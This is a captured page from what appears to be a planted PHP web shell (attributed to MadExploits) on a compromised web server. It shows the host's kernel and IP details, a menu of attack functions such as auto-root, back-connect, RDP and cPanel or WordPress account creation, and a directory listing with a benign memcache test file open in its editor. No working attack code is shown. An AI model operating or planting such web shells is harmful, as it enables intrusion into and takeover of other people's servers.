Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
memcache-4.0.5.2 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
001.phpt
551
B
-rw-r--r--
002.phpt
1.25
KB
-rw-r--r--
003.phpt
1.14
KB
-rw-r--r--
004.phpt
523
B
-rw-r--r--
005.phpt
3.64
KB
-rw-r--r--
006.phpt
430
B
-rw-r--r--
007.phpt
453
B
-rw-r--r--
008.phpt
302
B
-rw-r--r--
009.phpt
548
B
-rw-r--r--
010.phpt
613
B
-rw-r--r--
011.phpt
554
B
-rw-r--r--
012.phpt
499
B
-rw-r--r--
013.phpt
325
B
-rw-r--r--
014.phpt
396
B
-rw-r--r--
015.phpt
437
B
-rw-r--r--
016.phpt
276
B
-rw-r--r--
017.phpt
394
B
-rw-r--r--
018.phpt
398
B
-rw-r--r--
019.phpt
1.62
KB
-rw-r--r--
019a.phpt
687
B
-rw-r--r--
020.phpt
1.29
KB
-rw-r--r--
021.phpt
1.01
KB
-rw-r--r--
022.phpt
1.03
KB
-rw-r--r--
022a.phpt
1.14
KB
-rw-r--r--
023.phpt
1.72
KB
-rw-r--r--
024.phpt
904
B
-rw-r--r--
024a.phpt
1.15
KB
-rw-r--r--
025.phpt
1.23
KB
-rw-r--r--
026.phpt
677
B
-rw-r--r--
027.phpt
882
B
-rw-r--r--
027a.phpt
1.84
KB
-rw-r--r--
028.phpt
358
B
-rw-r--r--
029.phpt
1.32
KB
-rw-r--r--
030.phpt
557
B
-rw-r--r--
031.phpt
2.26
KB
-rw-r--r--
032.phpt
2.01
KB
-rw-r--r--
033.phpt
3.88
KB
-rw-r--r--
034.phpt
1.63
KB
-rw-r--r--
035.phpt
775
B
-rw-r--r--
036.phpt
1.5
KB
-rw-r--r--
036b.phpt
1.46
KB
-rw-r--r--
037.phpt
486
B
-rw-r--r--
038.phpt
851
B
-rw-r--r--
039.phpt
790
B
-rw-r--r--
040.phpt
1.21
KB
-rw-r--r--
041.phpt
1
KB
-rw-r--r--
042.phpt
1.12
KB
-rw-r--r--
043.phpt
1.68
KB
-rw-r--r--
044.phpt
1.84
KB
-rw-r--r--
045.phpt
842
B
-rw-r--r--
046.phpt
1.64
KB
-rw-r--r--
047.phpt
1.36
KB
-rw-r--r--
048.phpt
728
B
-rw-r--r--
049.phpt
709
B
-rw-r--r--
050.phpt
706
B
-rw-r--r--
051.phpt
590
B
-rw-r--r--
052.phpt
611
B
-rw-r--r--
053.phpt
988
B
-rw-r--r--
054.phpt
573
B
-rw-r--r--
055.phpt
769
B
-rw-r--r--
056.phpt
1.56
KB
-rw-r--r--
057.phpt
1.17
KB
-rw-r--r--
058.phpt
213
B
-rw-r--r--
100.phpt
954
B
-rw-r--r--
100a.phpt
1.04
KB
-rw-r--r--
100b.phpt
1.29
KB
-rw-r--r--
bug73539.phpt
906
B
-rw-r--r--
connect.inc
2.3
KB
-rw-r--r--
githubbug13.phpt
465
B
-rw-r--r--
memcache.sh
255
B
-rw-r--r--
pecl11221.phpt
490
B
-rw-r--r--
pecl16442.phpt
361
B
-rw-r--r--
pecl16536.phpt
342
B
-rw-r--r--
pecl17518.phpt
714
B
-rw-r--r--
pecl17566.phpt
353
B
-rw-r--r--
pecl63142.phpt
722
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 027.phpt
--TEST-- memcache->setCompressThreshold() --SKIPIF-- <?php include 'connect.inc'; ?> --FILE-- <?php include 'connect.inc'; $var = str_repeat('abc', 5000); $memcache->setCompressThreshold(10000); $result1 = $memcache->set('non_existing_test_key', $var, 0, 1); $result2 = $memcache->get('non_existing_test_key'); var_dump($result1); var_dump(strlen($result2)); $memcache->setCompressThreshold(10000, 0); $result3 = $memcache->set('non_existing_test_key', $var, 0, 1); $memcache->setCompressThreshold(10000, 1); $result4 = $memcache->set('non_existing_test_key', $var, 0, 1); var_dump($result3); var_dump($result4); $result5 = $memcache->set('non_existing_test_key', 'abc', MEMCACHE_COMPRESSED, 1); $result6 = $memcache->get('non_existing_test_key'); var_dump($result5); var_dump($result6); ?> --EXPECT-- bool(true) int(15000) bool(true) bool(true) bool(true) string(3) "abc"
Close